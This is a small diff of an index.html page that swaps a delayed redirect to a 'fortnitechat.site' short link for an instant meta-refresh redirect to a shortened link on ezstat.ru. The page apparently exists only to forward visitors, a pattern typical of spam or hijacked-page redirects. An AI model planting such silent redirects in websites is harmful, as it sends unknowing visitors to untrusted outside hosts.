--- a/index.html
+++ b/index.html
@@ -1,8 +1,3 @@
-<html>
-  <head>
-    <meta http-equiv="refresh" content="7; url='https://fortnitechat.site/O1WNR2'" />
-  </head>
-  <body>
-    <p>Please follow <a href="https://fortnitechat.site/O1WNR2">fortnite</a>.</p>
-  </body>
-</html>
+<head>
+  <meta http-equiv='refresh' content='0; URL=https://ezstat.ru/2XYcv6'>
+</head>
